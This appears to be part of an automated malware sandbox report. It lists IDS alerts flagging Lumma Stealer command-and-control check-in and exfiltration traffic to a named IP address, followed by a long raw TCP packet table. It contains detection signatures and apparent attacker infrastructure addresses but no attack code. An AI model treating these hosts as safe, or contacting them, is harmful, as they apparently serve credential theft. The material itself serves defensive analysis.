2024-11-23T12:47:30.610883+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49747	104.21.88.250	443	TCP
2024-11-23T12:47:32.221521+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49748	104.21.88.250	443	TCP
2024-11-23T12:47:34.437519+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49749	104.21.88.250	443	TCP
2024-11-23T12:47:36.720382+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49751	104.21.88.250	443	TCP
2024-11-23T12:47:39.525155+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49752	104.21.88.250	443	TCP
2024-11-23T12:47:40.236614+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49752	104.21.88.250	443	TCP
2024-11-23T12:47:41.972082+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49754	104.21.88.250	443	TCP
2024-11-23T12:47:43.665732+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49756	104.21.88.250	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 23, 2024 12:47:10.079432011 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:10.079477072 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:10.082109928 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:10.112059116 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:10.112081051 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:11.350065947 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:11.350142956 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:11.356292009 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:11.356309891 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:11.356729031 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:11.384210110 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:11.431377888 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.194892883 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.195139885 CET	443	49730	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.195210934 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.198153019 CET	49730	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.201183081 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.201225042 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.201364040 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.201618910 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.201637030 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.295226097 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.295258999 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:12.295331001 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.298084021 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:12.298098087 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.510802031 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.512953043 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.513015032 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.516566038 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.516669989 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.518117905 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.518124104 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.519072056 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.525757074 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.571326971 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.956244946 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.956473112 CET	443	49732	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.956553936 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.957379103 CET	49732	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.960222960 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.960304022 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.960395098 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.960659981 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.960685968 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.972202063 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.972440958 CET	443	49731	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:13.976383924 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.976656914 CET	49731	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:13.980266094 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:14.099852085 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:14.100435972 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:14.100522995 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:14.220160961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.223310947 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:15.233027935 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:15.233092070 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:15.408783913 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.408909082 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.408962011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.408982992 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.408998013 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409032106 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409065008 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409065008 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.409099102 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409120083 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.409133911 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409166098 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409185886 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.409200907 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.409257889 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.528908014 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.529055119 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.529139042 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.619398117 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.619577885 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.619653940 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.623573065 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.623668909 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.623742104 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.632013083 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.632162094 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.632226944 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.640410900 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.640562057 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.640625000 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.648822069 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.648986101 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.649056911 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.657258987 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.657399893 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.657469034 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.665678978 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.665752888 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.665822029 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.674113989 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.674227953 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.674290895 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.677758932 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:15.678004980 CET	443	49733	104.20.3.235	192.168.2.4
Nov 23, 2024 12:47:15.678081989 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:15.678438902 CET	49733	443	192.168.2.4	104.20.3.235
Nov 23, 2024 12:47:15.681816101 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.682507038 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.682622910 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.682696104 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.690967083 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.691003084 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.691077948 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.699353933 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.699390888 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.699456930 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.809937954 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.810046911 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.810266972 CET	49735	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.830034971 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.830183029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.830250978 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.832714081 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.832854033 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.832959890 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.838176012 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.838260889 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.838326931 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.843559027 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.843719006 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.843791962 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.849070072 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.849128962 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.849189043 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.854424953 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.854628086 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.854691029 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.859852076 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.859955072 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.860014915 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.865267038 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.865463972 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.865550041 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.870687962 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.870812893 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.870893955 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.876110077 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.876254082 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.876331091 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.881558895 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.881678104 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.881752014 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.886939049 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.887074947 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.887134075 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.892368078 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.892492056 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.892579079 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.897789001 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.897921085 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.897983074 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.903203011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.903359890 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.903423071 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:15.908602953 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.929754972 CET	80	49735	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:15.953973055 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.045583010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.045682907 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.045751095 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.048099995 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.048214912 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.048285007 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.053370953 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.053409100 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.053478956 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.058482885 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.058538914 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.058619976 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.063577890 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.063653946 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.063733101 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.069014072 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.069091082 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.069197893 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.073785067 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.073904991 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.073967934 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.078933001 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.079010010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.079071045 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.084108114 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.084228992 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.087857008 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.089140892 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.089323044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.089395046 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.094290972 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.094346046 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.094405890 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.099374056 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.099483967 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.099541903 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.104485035 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.104604006 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.104665041 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.109600067 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.109745026 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.109802008 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.114696980 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.114804029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.114872932 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.119817019 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.119962931 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.120027065 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.124922991 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.125042915 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.125109911 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.130069971 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.130235910 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.130295038 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.135128021 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.135282993 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.135356903 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.140681028 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.140790939 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.140909910 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.145390987 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.145517111 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.145576000 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.150605917 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.150751114 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.150810003 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.155616045 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.155673027 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.155725956 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.160738945 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.160841942 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.160917044 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.165855885 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.165935993 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.166021109 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.251095057 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.251241922 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.251331091 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.253354073 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.253484011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.253547907 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.256946087 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.257049084 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.257101059 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.261538029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.261708975 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.261769056 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.266625881 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.266834974 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.266891956 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.271157026 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.271224976 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.271290064 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.275379896 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.275494099 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.275543928 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.280052900 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.280148983 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.280203104 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.284629107 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.284742117 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.284796000 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.289242029 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.289376020 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.289446115 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.293854952 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.294028044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.294111013 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.298475981 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.298614025 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.298670053 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.302170038 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.302278042 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.302335024 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.305778980 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.305882931 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.305943966 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.311446905 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.311615944 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.311675072 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.316827059 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.316999912 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.317095041 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.319514036 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.319570065 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.319638014 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.321993113 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.322118044 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.322205067 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.324805975 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.324981928 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.325040102 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.327723980 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.327766895 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.327827930 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.330984116 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.331124067 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.331182957 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.334713936 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.334809065 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.334872961 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.338192940 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.338351011 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.338406086 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.341789961 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.341989994 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.342048883 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.345462084 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.345535994 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.345597029 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.349014997 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.349118948 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.349178076 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.352694035 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.352746010 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.352804899 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.356288910 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.356395960 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.356450081 CET	49734	80	192.168.2.4	192.81.132.76
Nov 23, 2024 12:47:16.360018969 CET	80	49734	192.81.132.76	192.168.2.4
Nov 23, 2024 12:47:16.360122919 CET	80	49734	192.81.132.76	192.168.2.4
